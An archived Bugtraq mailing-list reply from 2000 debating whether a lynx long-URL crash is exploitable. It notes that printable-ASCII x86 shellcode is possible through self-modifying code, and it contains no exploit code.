[14225] in bugtraq
Re: lynx - someone is deaf and blind ;)
daemon@ATHENA.MIT.EDU (Steve VanDevender)
Thu Mar 9 03:21:10 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <14534.38991.771639.187716@hexadecimal.uoregon.edu>
Date: Wed, 8 Mar 2000 10:13:35 -0800
Reply-To: Steve VanDevender <stevev@HEXADECIMAL.UOREGON.EDU>
From: Steve VanDevender <stevev@HEXADECIMAL.UOREGON.EDU>
X-To: Mariusz Woloszyn <emsi@IT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.04.10003071857260.12554-100000@dzyngiel.ipartners.pl>
Mariusz Woloszyn writes:
> It's true that lynx segfaults on long URLs, but exploiting it is (IMHO)
> impossible because lynx strips all nonprintable characters thus smugling
> RET address is impossible. I have never heard about ASCII only shellcode
> also :)
> I assume lynx bugs are unexploitable...
Don't bet on it. For the x86, at least, it's not that hard to use only
the opcodes that are printable ASCII characters to write pretty much any
program you'd want; using self-modifying code you can generate the
opcodes that aren't in the printable ASCII set. I've seen examples,
such as a printable-ASCII-only .COM file for bootstrapping a DOS Kermit
distribution.
